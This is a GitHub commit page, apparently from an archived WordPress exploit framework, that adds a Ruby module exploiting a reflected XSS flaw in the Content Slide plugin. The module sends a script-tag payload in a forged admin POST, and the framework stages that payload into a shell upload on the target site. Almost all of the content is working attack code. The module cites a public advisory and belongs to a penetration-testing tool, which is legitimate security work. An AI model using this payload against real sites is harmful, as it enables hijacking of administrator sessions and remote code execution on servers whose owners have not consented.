Skip to content
This repository was archived by the owner on Oct 22, 2020. It is now read-only.

Commit e7a8a21

Browse files
committed
Land #32, Add Content Slide reflected XSS shell upload
2 parents b490692 + 2364e27 commit e7a8a21

File tree

1 file changed

+36
-0
lines changed

1 file changed

+36
-0
lines changed
Lines changed: 36 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,36 @@
1+
class Wpxf::Exploit::ContentSlideReflectedXssShellUpload < Wpxf::Module
2+
include Wpxf::WordPress::StagedReflectedXss
3+
4+
def initialize
5+
super
6+
7+
update_info(
8+
name: 'Content Slide Reflected XSS Shell Upload',
9+
author: [
10+
'Tom Adams (dxw)', # Disclosure
11+
'Paul Williams <[email protected]' # WPXF module
12+
],
13+
references: [
14+
['WPVDB', '7908'],
15+
['URL', 'https://security.dxw.com/advisories/csrf-and-stored-xss-in-wordpress-content-slide-allow-an-attacker-to-have-full-admin-privileges/']
16+
],
17+
date: 'Apr 16 2015'
18+
)
19+
end
20+
21+
def check
22+
check_plugin_version_from_readme('content-slide')
23+
end
24+
25+
def vulnerable_url
26+
normalize_uri(wordpress_url_admin, 'admin.php?page=content-slide/content_slide.php')
27+
end
28+
29+
def initial_script
30+
create_basic_post_script(
31+
vulnerable_url,
32+
'wpcs_options[no_of_custom_images]' => 1,
33+
'wpcs_options[slide_image1]' => "\\\"><script>#{xss_ascii_encoded_include_script}<\\/script>"
34+
)
35+
end
36+
end

0 commit comments

Comments
 (0)